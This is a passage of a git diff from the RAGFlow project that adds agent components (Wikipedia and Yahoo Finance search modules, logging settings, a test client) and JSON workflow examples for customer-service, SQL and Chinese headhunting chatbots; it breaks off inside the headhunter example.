|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import random
|
||||
from abc import ABC
|
||||
from functools import partial
|
||||
import wikipedia
|
||||
import pandas as pd
|
||||
from agent.settings import DEBUG
|
||||
from agent.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class WikipediaParam(ComponentParamBase):
|
||||
"""
|
||||
Define the Wikipedia component parameters.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.top_n = 10
|
||||
self.language = "en"
|
||||
|
||||
def check(self):
|
||||
self.check_positive_integer(self.top_n, "Top N")
|
||||
self.check_valid_value(self.language, "Wikipedia languages",
|
||||
['af', 'pl', 'ar', 'ast', 'az', 'bg', 'nan', 'bn', 'be', 'ca', 'cs', 'cy', 'da', 'de',
|
||||
'et', 'el', 'en', 'es', 'eo', 'eu', 'fa', 'fr', 'gl', 'ko', 'hy', 'hi', 'hr', 'id',
|
||||
'it', 'he', 'ka', 'lld', 'la', 'lv', 'lt', 'hu', 'mk', 'arz', 'ms', 'min', 'my', 'nl',
|
||||
'ja', 'nb', 'nn', 'ce', 'uz', 'pt', 'kk', 'ro', 'ru', 'ceb', 'sk', 'sl', 'sr', 'sh',
|
||||
'fi', 'sv', 'ta', 'tt', 'th', 'tg', 'azb', 'tr', 'uk', 'ur', 'vi', 'war', 'zh', 'yue'])
|
||||
|
||||
|
||||
class Wikipedia(ComponentBase, ABC):
|
||||
component_name = "Wikipedia"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
ans = self.get_input()
|
||||
ans = " - ".join(ans["content"]) if "content" in ans else ""
|
||||
if not ans:
|
||||
return Wikipedia.be_output("")
|
||||
|
||||
try:
|
||||
wiki_res = []
|
||||
wikipedia.set_lang(self._param.language)
|
||||
wiki_engine = wikipedia
|
||||
for wiki_key in wiki_engine.search(ans, results=self._param.top_n):
|
||||
page = wiki_engine.page(title=wiki_key, auto_suggest=False)
|
||||
wiki_res.append({"content": '<a href="' + page.url + '">' + page.title + '</a> ' + page.summary})
|
||||
except Exception as e:
|
||||
return Wikipedia.be_output("**ERROR**: " + str(e))
|
||||
|
||||
if not wiki_res:
|
||||
return Wikipedia.be_output("")
|
||||
|
||||
df = pd.DataFrame(wiki_res)
|
||||
if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
|
||||
return df
|
||||
83
agent/component/yahoofinance.py
Normal file
83
agent/component/yahoofinance.py
Normal file
@ -0,0 +1,83 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from abc import ABC
|
||||
import pandas as pd
|
||||
from agent.component.base import ComponentBase, ComponentParamBase
|
||||
import yfinance as yf
|
||||
|
||||
|
||||
class YahooFinanceParam(ComponentParamBase):
|
||||
"""
|
||||
Define the YahooFinance component parameters.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.info = True
|
||||
self.history = False
|
||||
self.count = False
|
||||
self.financials = False
|
||||
self.income_stmt = False
|
||||
self.balance_sheet = False
|
||||
self.cash_flow_statement = False
|
||||
self.news = True
|
||||
|
||||
def check(self):
|
||||
self.check_boolean(self.info, "get all stock info")
|
||||
self.check_boolean(self.history, "get historical market data")
|
||||
self.check_boolean(self.count, "show share count")
|
||||
self.check_boolean(self.financials, "show financials")
|
||||
self.check_boolean(self.income_stmt, "income statement")
|
||||
self.check_boolean(self.balance_sheet, "balance sheet")
|
||||
self.check_boolean(self.cash_flow_statement, "cash flow statement")
|
||||
self.check_boolean(self.news, "show news")
|
||||
|
||||
|
||||
class YahooFinance(ComponentBase, ABC):
|
||||
component_name = "YahooFinance"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
ans = self.get_input()
|
||||
ans = "".join(ans["content"]) if "content" in ans else ""
|
||||
if not ans:
|
||||
return YahooFinance.be_output("")
|
||||
|
||||
yohoo_res = []
|
||||
try:
|
||||
msft = yf.Ticker(ans)
|
||||
if self._param.info:
|
||||
yohoo_res.append({"content": "info:\n" + pd.Series(msft.info).to_markdown() + "\n"})
|
||||
if self._param.history:
|
||||
yohoo_res.append({"content": "history:\n" + msft.history().to_markdown() + "\n"})
|
||||
if self._param.financials:
|
||||
yohoo_res.append({"content": "calendar:\n" + pd.DataFrame(msft.calendar).to_markdown() + "\n"})
|
||||
if self._param.balance_sheet:
|
||||
yohoo_res.append({"content": "balance sheet:\n" + msft.balance_sheet.to_markdown() + "\n"})
|
||||
yohoo_res.append(
|
||||
{"content": "quarterly balance sheet:\n" + msft.quarterly_balance_sheet.to_markdown() + "\n"})
|
||||
if self._param.cash_flow_statement:
|
||||
yohoo_res.append({"content": "cash flow statement:\n" + msft.cashflow.to_markdown() + "\n"})
|
||||
yohoo_res.append(
|
||||
{"content": "quarterly cash flow statement:\n" + msft.quarterly_cashflow.to_markdown() + "\n"})
|
||||
if self._param.news:
|
||||
yohoo_res.append({"content": "news:\n" + pd.DataFrame(msft.news).to_markdown() + "\n"})
|
||||
except Exception as e:
|
||||
print("**ERROR** " + str(e))
|
||||
|
||||
if not yohoo_res:
|
||||
return YahooFinance.be_output("")
|
||||
|
||||
return pd.DataFrame(yohoo_res)
|
||||
34
agent/settings.py
Normal file
34
agent/settings.py
Normal file
@ -0,0 +1,34 @@
|
||||
#
|
||||
# Copyright 2019 The FATE Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
# Logger
|
||||
import os
|
||||
|
||||
from api.utils.file_utils import get_project_base_directory
|
||||
from api.utils.log_utils import LoggerFactory, getLogger
|
||||
|
||||
DEBUG = 0
|
||||
LoggerFactory.set_directory(
|
||||
os.path.join(
|
||||
get_project_base_directory(),
|
||||
"logs",
|
||||
"flow"))
|
||||
# {CRITICAL: 50, FATAL:50, ERROR:40, WARNING:30, WARN:30, INFO:20, DEBUG:10, NOTSET:0}
|
||||
LoggerFactory.LEVEL = 30
|
||||
|
||||
flow_logger = getLogger("flow")
|
||||
database_logger = getLogger("database")
|
||||
FLOAT_ZERO = 1e-8
|
||||
PARAM_MAXDEPTH = 5
|
||||
687
agent/templates/DB Assistant.json
Normal file
687
agent/templates/DB Assistant.json
Normal file
File diff suppressed because one or more lines are too long
725
agent/templates/HR_callout_zh.json
Normal file
725
agent/templates/HR_callout_zh.json
Normal file
File diff suppressed because one or more lines are too long
620
agent/templates/customer_service.json
Normal file
620
agent/templates/customer_service.json
Normal file
File diff suppressed because one or more lines are too long
335
agent/templates/general_chat_bot.json
Normal file
335
agent/templates/general_chat_bot.json
Normal file
File diff suppressed because one or more lines are too long
158
agent/templates/interpreter.json
Normal file
158
agent/templates/interpreter.json
Normal file
File diff suppressed because one or more lines are too long
492
agent/templates/medical_consultation.json
Normal file
492
agent/templates/medical_consultation.json
Normal file
File diff suppressed because one or more lines are too long
445
agent/templates/text2sql.json
Normal file
445
agent/templates/text2sql.json
Normal file
File diff suppressed because one or more lines are too long
547
agent/templates/websearch_assistant.json
Normal file
547
agent/templates/websearch_assistant.json
Normal file
File diff suppressed because one or more lines are too long
48
agent/test/client.py
Normal file
48
agent/test/client.py
Normal file
@ -0,0 +1,48 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import argparse
|
||||
import os
|
||||
from functools import partial
|
||||
from agent.canvas import Canvas
|
||||
from agent.settings import DEBUG
|
||||
|
||||
if __name__ == '__main__':
|
||||
parser = argparse.ArgumentParser()
|
||||
dsl_default_path = os.path.join(
|
||||
os.path.dirname(os.path.realpath(__file__)),
|
||||
"dsl_examples",
|
||||
"retrieval_and_generate.json",
|
||||
)
|
||||
parser.add_argument('-s', '--dsl', default=dsl_default_path, help="input dsl", action='store', required=True)
|
||||
parser.add_argument('-t', '--tenant_id', default=False, help="Tenant ID", action='store', required=True)
|
||||
parser.add_argument('-m', '--stream', default=False, help="Stream output", action='store_true', required=False)
|
||||
args = parser.parse_args()
|
||||
|
||||
canvas = Canvas(open(args.dsl, "r").read(), args.tenant_id)
|
||||
while True:
|
||||
ans = canvas.run(stream=args.stream)
|
||||
print("==================== Bot =====================\n> ", end='')
|
||||
if args.stream and isinstance(ans, partial):
|
||||
cont = ""
|
||||
for an in ans():
|
||||
print(an["content"][len(cont):], end='', flush=True)
|
||||
cont = an["content"]
|
||||
else:
|
||||
print(ans["content"])
|
||||
|
||||
if DEBUG: print(canvas.path)
|
||||
question = input("\n==================== User =====================\n> ")
|
||||
canvas.add_user_input(question)
|
||||
129
agent/test/dsl_examples/baidu_generate_and_switch.json
Normal file
129
agent/test/dsl_examples/baidu_generate_and_switch.json
Normal file
@ -0,0 +1,129 @@
|
||||
{
|
||||
"components": {
|
||||
"begin": {
|
||||
"obj":{
|
||||
"component_name": "Begin",
|
||||
"params": {
|
||||
"prologue": "Hi there!"
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": []
|
||||
},
|
||||
"answer:0": {
|
||||
"obj": {
|
||||
"component_name": "Answer",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["baidu:0"],
|
||||
"upstream": ["begin", "message:0","message:1"]
|
||||
},
|
||||
"baidu:0": {
|
||||
"obj": {
|
||||
"component_name": "Baidu",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["generate:0"],
|
||||
"upstream": ["answer:0"]
|
||||
},
|
||||
"generate:0": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "You are an intelligent assistant. Please answer the user's question based on what Baidu searched. First, please output the user's question and the content searched by Baidu, and then answer yes, no, or i don't know.Here is the user's question:{user_input}The above is the user's question.Here is what Baidu searched for:{baidu}The above is the content searched by Baidu.",
|
||||
"temperature": 0.2
|
||||
},
|
||||
"parameters": [
|
||||
{
|
||||
"component_id": "answer:0",
|
||||
"id": "69415446-49bf-4d4b-8ec9-ac86066f7709",
|
||||
"key": "user_input"
|
||||
},
|
||||
{
|
||||
"component_id": "baidu:0",
|
||||
"id": "83363c2a-00a8-402f-a45c-ddc4097d7d8b",
|
||||
"key": "baidu"
|
||||
}
|
||||
]
|
||||
},
|
||||
"downstream": ["switch:0"],
|
||||
"upstream": ["baidu:0"]
|
||||
},
|
||||
"switch:0": {
|
||||
"obj": {
|
||||
"component_name": "Switch",
|
||||
"params": {
|
||||
"conditions": [
|
||||
{
|
||||
"logical_operator" : "or",
|
||||
"items" : [
|
||||
{"cpn_id": "generate:0", "operator": "contains", "value": "yes"},
|
||||
{"cpn_id": "generate:0", "operator": "contains", "value": "yeah"}
|
||||
],
|
||||
"to": "message:0"
|
||||
},
|
||||
{
|
||||
"logical_operator" : "and",
|
||||
"items" : [
|
||||
{"cpn_id": "generate:0", "operator": "contains", "value": "no"},
|
||||
{"cpn_id": "generate:0", "operator": "not contains", "value": "yes"},
|
||||
{"cpn_id": "generate:0", "operator": "not contains", "value": "know"}
|
||||
],
|
||||
"to": "message:1"
|
||||
},
|
||||
{
|
||||
"logical_operator" : "",
|
||||
"items" : [
|
||||
{"cpn_id": "generate:0", "operator": "contains", "value": "know"}
|
||||
],
|
||||
"to": "message:2"
|
||||
}
|
||||
],
|
||||
"end_cpn_id": "answer:0"
|
||||
|
||||
}
|
||||
},
|
||||
"downstream": ["message:0","message:1"],
|
||||
"upstream": ["generate:0"]
|
||||
},
|
||||
"message:0": {
|
||||
"obj": {
|
||||
"component_name": "Message",
|
||||
"params": {
|
||||
"messages": ["YES YES YES YES YES YES YES YES YES YES YES YES"]
|
||||
}
|
||||
},
|
||||
|
||||
"upstream": ["switch:0"],
|
||||
"downstream": ["answer:0"]
|
||||
},
|
||||
"message:1": {
|
||||
"obj": {
|
||||
"component_name": "Message",
|
||||
"params": {
|
||||
"messages": ["NO NO NO NO NO NO NO NO NO NO NO NO NO NO"]
|
||||
}
|
||||
},
|
||||
|
||||
"upstream": ["switch:0"],
|
||||
"downstream": ["answer:0"]
|
||||
},
|
||||
"message:2": {
|
||||
"obj": {
|
||||
"component_name": "Message",
|
||||
"params": {
|
||||
"messages": ["I DON'T KNOW---------------------------"]
|
||||
}
|
||||
},
|
||||
|
||||
"upstream": ["switch:0"],
|
||||
"downstream": ["answer:0"]
|
||||
}
|
||||
},
|
||||
"history": [],
|
||||
"messages": [],
|
||||
"reference": {},
|
||||
"path": [],
|
||||
"answer": []
|
||||
}
|
||||
45
agent/test/dsl_examples/categorize.json
Normal file
45
agent/test/dsl_examples/categorize.json
Normal file
@ -0,0 +1,45 @@
|
||||
{
|
||||
"components": {
|
||||
"begin": {
|
||||
"obj":{
|
||||
"component_name": "Begin",
|
||||
"params": {
|
||||
"prologue": "Hi there!"
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": []
|
||||
},
|
||||
"answer:0": {
|
||||
"obj": {
|
||||
"component_name": "Answer",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["categorize:0"],
|
||||
"upstream": ["begin"]
|
||||
},
|
||||
"categorize:0": {
|
||||
"obj": {
|
||||
"component_name": "Categorize",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"category_description": {
|
||||
"product_related": {
|
||||
"description": "The question is about the product usage, appearance and how it works.",
|
||||
"examples": "Why it always beaming?\nHow to install it onto the wall?\nIt leaks, what to do?"
|
||||
},
|
||||
"others": {
|
||||
"description": "The question is not about the product usage, appearance and how it works.",
|
||||
"examples": "How are you doing?\nWhat is your name?\nAre you a robot?\nWhat's the weather?\nWill it rain?"
|
||||
}
|
||||
}
|
||||
}
|
||||
},
|
||||
"downstream": [],
|
||||
"upstream": ["answer:0"]
|
||||
}
|
||||
},
|
||||
"history": [],
|
||||
"path": [],
|
||||
"answer": []
|
||||
}
|
||||
157
agent/test/dsl_examples/customer_service.json
Normal file
157
agent/test/dsl_examples/customer_service.json
Normal file
@ -0,0 +1,157 @@
|
||||
{
|
||||
"components": {
|
||||
"begin": {
|
||||
"obj":{
|
||||
"component_name": "Begin",
|
||||
"params": {
|
||||
"prologue": "Hi! How can I help you?"
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": []
|
||||
},
|
||||
"answer:0": {
|
||||
"obj": {
|
||||
"component_name": "Answer",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["categorize:0"],
|
||||
"upstream": ["begin", "generate:0", "generate:casual", "generate:answer", "generate:complain", "generate:ask_contact", "message:get_contact"]
|
||||
},
|
||||
"categorize:0": {
|
||||
"obj": {
|
||||
"component_name": "Categorize",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"category_description": {
|
||||
"product_related": {
|
||||
"description": "The question is about the product usage, appearance and how it works.",
|
||||
"examples": "Why it always beaming?\nHow to install it onto the wall?\nIt leaks, what to do?\nException: Can't connect to ES cluster\nHow to build the RAGFlow image from scratch",
|
||||
"to": "retrieval:0"
|
||||
},
|
||||
"casual": {
|
||||
"description": "The question is not about the product usage, appearance and how it works. Just casual chat.",
|
||||
"examples": "How are you doing?\nWhat is your name?\nAre you a robot?\nWhat's the weather?\nWill it rain?",
|
||||
"to": "generate:casual"
|
||||
},
|
||||
"complain": {
|
||||
"description": "Complain even curse about the product or service you provide. But the comment is not specific enough.",
|
||||
"examples": "How bad is it.\nIt's really sucks.\nDamn, for God's sake, can it be more steady?\nShit, I just can't use this shit.\nI can't stand it anymore.",
|
||||
"to": "generate:complain"
|
||||
},
|
||||
"answer": {
|
||||
"description": "This answer provide a specific contact information, like e-mail, phone number, wechat number, line number, twitter, discord, etc,.",
|
||||
"examples": "My phone number is 203921\nkevinhu.hk@gmail.com\nThis is my discord number: johndowson_29384",
|
||||
"to": "message:get_contact"
|
||||
}
|
||||
},
|
||||
"message_history_window_size": 8
|
||||
}
|
||||
},
|
||||
"downstream": ["retrieval:0", "generate:casual", "generate:complain", "message:get_contact"],
|
||||
"upstream": ["answer:0"]
|
||||
},
|
||||
"generate:casual": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "You are a customer support. But the customer wants to have a casual chat with you instead of consulting about the product. Be nice, funny, enthusiasm and concern.",
|
||||
"temperature": 0.9,
|
||||
"message_history_window_size": 12,
|
||||
"cite": false
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["categorize:0"]
|
||||
},
|
||||
"generate:complain": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "You are a customer support. the Customers complain even curse about the products but not specific enough. You need to ask him/her what's the specific problem with the product. Be nice, patient and concern to soothe your customers’ emotions at first place.",
|
||||
"temperature": 0.9,
|
||||
"message_history_window_size": 12,
|
||||
"cite": false
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["categorize:0"]
|
||||
},
|
||||
"retrieval:0": {
|
||||
"obj": {
|
||||
"component_name": "Retrieval",
|
||||
"params": {
|
||||
"similarity_threshold": 0.2,
|
||||
"keywords_similarity_weight": 0.3,
|
||||
"top_n": 6,
|
||||
"top_k": 1024,
|
||||
"rerank_id": "BAAI/bge-reranker-v2-m3",
|
||||
"kb_ids": ["869a236818b811ef91dffa163e197198"]
|
||||
}
|
||||
},
|
||||
"downstream": ["relevant:0"],
|
||||
"upstream": ["categorize:0"]
|
||||
},
|
||||
"relevant:0": {
|
||||
"obj": {
|
||||
"component_name": "Relevant",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"temperature": 0.02,
|
||||
"yes": "generate:answer",
|
||||
"no": "generate:ask_contact"
|
||||
}
|
||||
},
|
||||
"downstream": ["generate:answer", "generate:ask_contact"],
|
||||
"upstream": ["retrieval:0"]
|
||||
},
|
||||
"generate:answer": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "You are an intelligent assistant. Please answer the question based on content of knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n Knowledge base content is as following:\n {input}\n The above is the content of knowledge base.",
|
||||
"temperature": 0.02
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["relevant:0"]
|
||||
},
|
||||
"generate:ask_contact": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "You are a customer support. But you can't answer to customers' question. You need to request their contact like E-mail, phone number, Wechat number, LINE number, twitter, discord, etc,. Product experts will contact them later. Please do not ask the same question twice.",
|
||||
"temperature": 0.9,
|
||||
"message_history_window_size": 12,
|
||||
"cite": false
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["relevant:0"]
|
||||
},
|
||||
"message:get_contact": {
|
||||
"obj":{
|
||||
"component_name": "Message",
|
||||
"params": {
|
||||
"messages": [
|
||||
"Okay, I've already write this down. What else I can do for you?",
|
||||
"Get it. What else I can do for you?",
|
||||
"Thanks for your trust! Our expert will contact ASAP. So, anything else I can do for you?",
|
||||
"Thanks! So, anything else I can do for you?"
|
||||
]
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["categorize:0"]
|
||||
}
|
||||
},
|
||||
"history": [],
|
||||
"messages": [],
|
||||
"path": [],
|
||||
"reference": [],
|
||||
"answer": []
|
||||
}
|
||||
43
agent/test/dsl_examples/exesql.json
Normal file
43
agent/test/dsl_examples/exesql.json
Normal file
@ -0,0 +1,43 @@
|
||||
{
|
||||
"components": {
|
||||
"begin": {
|
||||
"obj":{
|
||||
"component_name": "Begin",
|
||||
"params": {
|
||||
"prologue": "Hi there!"
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": []
|
||||
},
|
||||
"answer:0": {
|
||||
"obj": {
|
||||
"component_name": "Answer",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["exesql:0"],
|
||||
"upstream": ["begin", "exesql:0"]
|
||||
},
|
||||
"exesql:0": {
|
||||
"obj": {
|
||||
"component_name": "ExeSQL",
|
||||
"params": {
|
||||
"database": "rag_flow",
|
||||
"username": "root",
|
||||
"host": "mysql",
|
||||
"port": 3306,
|
||||
"password": "infini_rag_flow",
|
||||
"top_n": 3
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["answer:0"]
|
||||
}
|
||||
},
|
||||
"history": [],
|
||||
"messages": [],
|
||||
"reference": {},
|
||||
"path": [],
|
||||
"answer": []
|
||||
}
|
||||
|
||||
210
agent/test/dsl_examples/headhunter_zh.json
Normal file
210
agent/test/dsl_examples/headhunter_zh.json
Normal file
@ -0,0 +1,210 @@
|
||||
{
|
||||
"components": {
|
||||
"begin": {
|
||||
"obj": {
|
||||
"component_name": "Begin",
|
||||
"params": {
|
||||
"prologue": "您好!我是AGI方向的猎头,了解到您是这方面的大佬,然后冒昧的就联系到您。这边有个机会想和您分享,RAGFlow正在招聘您这个岗位的资深的工程师不知道您那边是不是感兴趣?"
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": []
|
||||
},
|
||||
"answer:0": {
|
||||
"obj": {
|
||||
"component_name": "Answer",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["categorize:0"],
|
||||
"upstream": ["begin", "message:reject"]
|
||||
},
|
||||
"categorize:0": {
|
||||
"obj": {
|
||||
"component_name": "Categorize",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"category_description": {
|
||||
"about_job": {
|
||||
"description": "该问题关于职位本身或公司的信息。",
|
||||
"examples": "什么岗位?\n汇报对象是谁?\n公司多少人?\n公司有啥产品?\n具体工作内容是啥?\n地点哪里?\n双休吗?",
|
||||
"to": "retrieval:0"
|
||||
},
|
||||
"casual": {
|
||||
"description": "该问题不关于职位本身或公司的信息,属于闲聊。",
|
||||
"examples": "你好\n好久不见\n你男的女的?\n你是猴子派来的救兵吗?\n上午开会了?\n你叫啥?\n最近市场如何?生意好做吗?",
|
||||
"to": "generate:casual"
|
||||
},
|
||||
"interested": {
|
||||
"description": "该回答表示他对于该职位感兴趣。",
|
||||
"examples": "嗯\n说吧\n说说看\n还好吧\n是的\n哦\nyes\n具体说说",
|
||||
"to": "message:introduction"
|
||||
},
|
||||
"answer": {
|
||||
"description": "该回答表示他对于该职位不感兴趣,或感觉受到骚扰。",
|
||||
"examples": "不需要\n不感兴趣\n暂时不看\n不要\nno\n我已经不干这个了\n我不是这个方向的",
|
||||
"to": "message:reject"
|
||||
}
|
||||
}
|
||||
}
|
||||
},
|
||||
"downstream": [
|
||||
"message:introduction",
|
||||
"generate:casual",
|
||||
"message:reject",
|
||||
"retrieval:0"
|
||||
],
|
||||
"upstream": ["answer:0"]
|
||||
},
|
||||
"message:introduction": {
|
||||
"obj": {
|
||||
"component_name": "Message",
|
||||
"params": {
|
||||
"messages": [
|
||||
"我简单介绍以下:\nRAGFlow 是一款基于深度文档理解构建的开源 RAG(Retrieval-Augmented Generation)引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程,结合大语言模型(LLM)针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。https://github.com/infiniflow/ragflow\n您那边还有什么要了解的?"
|
||||
]
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:1"],
|
||||
"upstream": ["categorize:0"]
|
||||
},
|
||||
"answer:1": {
|
||||
"obj": {
|
||||
"component_name": "Answer",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["categorize:1"],
|
||||
"upstream": [
|
||||
"message:introduction",
|
||||
"generate:aboutJob",
|
||||
"generate:casual",
|
||||
"generate:get_wechat",
|
||||
"generate:nowechat"
|
||||
]
|
||||
},
|
||||
"categorize:1": {
|
||||
"obj": {
|
||||
"component_name": "Categorize",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"category_description": {
|
||||
"about_job": {
|
||||
"description": "该问题关于职位本身或公司的信息。",
|
||||
"examples": "什么岗位?\n汇报对象是谁?\n公司多少人?\n公司有啥产品?\n具体工作内容是啥?\n地点哪里?\n双休吗?",
|
||||
"to": "retrieval:0"
|
||||
},
|
||||
"casual": {
|
||||
"description": "该问题不关于职位本身或公司的信息,属于闲聊。",
|
||||
"examples": "你好\n好久不见\n你男的女的?\n你是猴子派来的救兵吗?\n上午开会了?\n你叫啥?\n最近市场如何?生意好做吗?",
|
||||
"to": "generate:casual"
|
||||
},
|
||||
"wechat": {
|
||||
"description": "该回答表示他愿意加微信,或者已经报了微信号。",
|
||||
"examples": "嗯\n可以\n是的\n哦\nyes\n15002333453\nwindblow_2231",
|
||||
"to": "generate:get_wechat"
|
||||
},
|
||||
"giveup": {
|
||||
"description": "该回答表示他不愿意加微信。",
|
||||
"examples": "不需要\n不感兴趣\n暂时不看\n不要\nno\n不方便\n不知道还要加我微信",
|
||||
"to": "generate:nowechat"
|
||||
}
|
||||
},
|
||||
"message_history_window_size": 8
|
||||
}
|
||||
},
|
||||
"downstream": [
|
||||
"retrieval:0",
|
||||
"generate:casual",
|
||||
"generate:get_wechat",
|
||||
"generate:nowechat"
|
||||
],
|
||||
"upstream": ["answer:1"]
|
||||
},
|
||||
"generate:casual": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "你是AGI方向的猎头,现在候选人的聊了和职位无关的话题,请耐心的回应候选人,并将话题往该AGI的职位上带,最好能要到候选人微信号以便后面保持联系。",
|
||||
"temperature": 0.9,
|
||||
"message_history_window_size": 12,
|
||||
"cite": false
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:1"],
|
||||
"upstream": ["categorize:0", "categorize:1"]
|
||||
},
|
||||
"retrieval:0": {
|
||||
"obj": {
|
||||
"component_name": "Retrieval",
|
||||
"params": {
|
||||
"similarity_threshold": 0.2,
|
||||
"keywords_similarity_weight": 0.3,
|
||||
"top_n": 6,
|
||||
"top_k": 1024,
|
||||
"rerank_id": "BAAI/bge-reranker-v2-m3",
|
||||
"kb_ids": ["869a236818b811ef91dffa163e197198"]
|
||||
}
|
||||
},
|
||||
"downstream": ["generate:aboutJob"],
|
||||
"upstream": ["categorize:0", "categorize:1"]
|
||||
},
|
||||
"generate:aboutJob": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "你是AGI方向的猎头,候选人问了有关职位或公司的问题,你根据以下职位信息回答。如果职位信息中不包含候选人的问题就回答不清楚、不知道、有待确认等。回答完后引导候选人加微信号,如:\n - 方便加一下微信吗,我把JD发您看看?\n - 微信号多少,我把详细职位JD发您?\n 职位信息如下:\n {input}\n 职位信息如上。",
|
||||
"temperature": 0.02
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:1"],
|
||||
"upstream": ["retrieval:0"]
|
||||
},
|
||||
"generate:get_wechat": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "你是AGI方向的猎头,候选人表示不反感加微信,如果对方已经报了微信号,表示感谢和信任并表示马上会加上;如果没有,则问对方微信号多少。你的微信号是weixin_kevin,E-mail是kkk@ragflow.com。说话不要重复。不要总是您好。",
|
||||
"temperature": 0.1,
|
||||
"message_history_window_size": 12,
|
||||
"cite": false
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:1"],
|
||||
"upstream": ["categorize:1"]
|
||||
},
|
||||
"generate:nowechat": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "你是AGI方向的猎头,当你提出加微信时对方表示拒绝。你需要耐心礼貌的回应候选人,表示对于保护隐私信息给予理解,也可以询问他对该职位的看法和顾虑。并在恰当的时机再次询问微信联系方式。也可以鼓励候选人主动与你取得联系。你的微信号是weixin_kevin,E-mail是kkk@ragflow.com。说话不要重复。不要总是您好。",
|
||||
